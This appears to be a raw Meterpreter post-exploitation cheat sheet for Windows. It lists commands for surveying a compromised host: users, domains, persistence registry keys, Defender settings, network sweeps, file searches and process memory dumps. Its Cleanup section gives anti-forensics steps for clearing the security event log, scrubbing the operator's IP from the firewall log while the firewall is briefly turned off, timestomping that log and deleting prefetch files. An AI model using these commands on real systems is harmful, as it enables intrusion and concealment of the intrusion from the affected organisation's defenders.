master
Raw Download raw file

date: “2017-02-21” draft: false title: “Meterpreter Survey - Windows”

Init

  1. Situational Awareness
  • getuid # Get the meterpreter current User Id
  • getpid # Get the meterpreter current PID
  • ipconfig # Host Name, IP Address
    • sysinfo # Get the hostname, OS, and architecture of the system
    • ps # Get a list of the currently running processes and check current meterpreter process PID
    • netstat # Get a list of the current connections and listening ports
    • cd c:\\windows\\temp\\ # Change directory to have predictable File System interactions
  • idletime
  • pwd
  • ls
  1. System Date/Time
  • run wmic -c "timezone list brief" # Get the current time zone
  • run wmic -c "os get localdatetime" # Get the current time
  1. Security and Settings
  • run get_env # Show system environment variables
  • run getcountermeasure # Determine if firewall is enabled
  • run multicommand -cl "at","schtasks /query" # List scheduled tasks
  • run wmic -c "startup list" # Get a list of the applications that are set to launch at startup
  • run multicommand -cl "netsh firewall show logging" # Determine if the built-in firewall has logging enabled or disabled
  • run event_manager -i # Show which Windows event logs are available
  • reg enumkey -k "HKLM\\Security\\Policy\\PolAdtEv"
  • run uploadexec -e /<PATH_TP>/auditpol.exe -r -v

Domains and Users

  1. Domains
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v productname
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v currentversion
  • reg queryval -k "HKLM\\system\\currentcontrolset\\services\\tcpip\\parameters" -v "Domain"
  • run wmic -c "computersystem get domain"
  1. Users
  • run enum_logged_on_users -c
  • run wmic -c "netlogin get name,lastlogon,badpasswordcount"

Software

  1. Installed Software
  • run get_application_list
  1. Enumerate Persistance Vectors
  • run wmic -c "startup list"
  • reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"
  • reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"
  • reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"
  • reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" -v "shell" # xp
    • reg queryval -k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"
  1. Defender / Security Essentials
  • migrate <PID> # Migrage to SYSTEM svchost, required for viewing/editing spynet registry
  • reg enumkey -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet"
  • reg enumkey -k "HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions"
  • reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting # 0=no, 1=basic, 2=advanced
  • ls "C:/programdata/microsoft/microsoft antimalware/quarantine/entries" # quarantined files
  • run event_manager -l SYSTEM -f 1001 # last scheduled job
  • cat "c:/windows/temp/MpSigStub.log"
  • cat "c:/windows/temp/MpCmdRun.log"
  1. Remote Logging
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC)\""
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (NP-In)\""
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC-EPMAP)\""
  • run multicommand -cl "netsh advfirewall firewall show rule name=\"Windows Remote Management (HTTP-In)\""
  1. Dr. Watson

Networking

  1. Local Area Networking
  • run multicommand -cl "ipconfig /all"
  • run multicommand -cl "ipconfig /displaydns"
  • netstat
  1. Network awareness
  • run netenum -ps -r <IPSTART>-<IPEND> # Pingsweeep of network range
  • run multicommand -cl "ping -n 2 <IP>"
  1. Internet Settings
  • reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable
  • reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer

Doucments and File System interactions

  1. Finding Files
  • search -f *.<EXT> # find all files of type <EXT>
  • search -d "C:\\<PATH>\\<DIR>\\" -f *.<EXT> -r" # search a specific <DIR>
  • run multicommand -cl "cmd /c dir c:\\*.<EXT> /S /A"
  • download <FILE> # download for offline analysis (e.g. strings)

Malware

  1. Enumerate processes and handles
  • ps
  • netstat
  • search -f <PROCESS>.exe
  • run multicommand -cl "tasklist /FI \"PID eq <PID>\" /M"
  • upload /<PATH> handle.exe
  • run multicommand -cl "cmd /c handle -p "<PROCESS>.exe" -accepteula"
  • rm C:\\<PATH>\\handle.exe
  • ls
  1. Related files
  • run multicommand -cl "cmd /c dir c:\\windows\\system32\\malicious.file"
  • run multicommand -cl "cmd /c dir c:\\ /S /A | findstr \"MM/DD/YYYY HH:MM\"" # related files by date
  • run multicommand -cl "cmd /c dir c:\\windows\\system32\\drivers /o:d /t:w" # recent drivers
  1. Strings and Memory
  • download <FILE> # download for offline analysis (e.g. strings)
  • run process_memdump -p PID

Cleanup

  1. Event Log
  • run event_manager -i
  • run event_manager -l security -f 529 # ms08_067
  • run event_manager -l security -f 680 # ms08_067
  • run event_manager -l system -f 1116 # bccaa_bof
  • run event_manager -l system -f 1117 # bcaaa_bof
  • run event_manager -c security
  • run event_manager -l security # expect 517 for cleared log
  1. Logs and Dump files
  • run multicommand -cl "cmd /c dir c:\\*.*log /S /A"
  • run multicommand -cl "cmd /c dir c:\\*.*dmp /S /A"
  • search -f *.*dmp
  • ls "c:\\documents and settings\\all users\\application data\\microsoft\\dr watson"
  1. WER
  • ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportarchive"
  • ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportqueue"
  • ls "c:\\ProgramData\\Microsoft\\Windows\\wer\\"
  1. Windows firewall log cleaning
  • run multicommand -cl "netsh advfirewall show currentprofile"
  • run multicommand -cl "netsh advfirewall show allprofiles"
  • run multicommand -cl "netsh advfirewall export \"c:/windows/temp/firewall.wfw\""
  • ls "c:/windows/system32/logfiles/firewall"
  • run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log"
  • cd c:/windows/temp
  • run multicommand -cl "cmd /c findstr /V \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log > c:\\windows\\temp\\fw.tmp"
  • run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\temp\\fw.tmp"
  • cat fw.tmp
  • ps
  • run multicommand -cl "netsh advfirewall set currentprofile state off"
  • run multicommand -cl "cmd /c move c:\\windows\\temp\\fw.tmp c:\\windows\\system32\\firewall\\pfirewall.log"
  • timestomp c:\\windows\\system32\\firewall\\pfirewall.log -m "MM/DD/YYYY HH:MM:SS"
  • ls c:\\windows\\system32\\firewall\\pfirewall.log
  • run multicommand -cl "netsh advfirewall import \"c:/windows/temp/firewall.wfw\""
  • run multicommand -cl "netsh advfirewall set currentprofile state on"
  • ls c:\\windows\\system32\\firewall\\pfirewall.log
  1. Prefetch Cleaning
  • cd c:\\windows\\prefetch
  • run multicommand -cl "cmd /c dir /o:d /t:w"
  • rm <FILE>.pf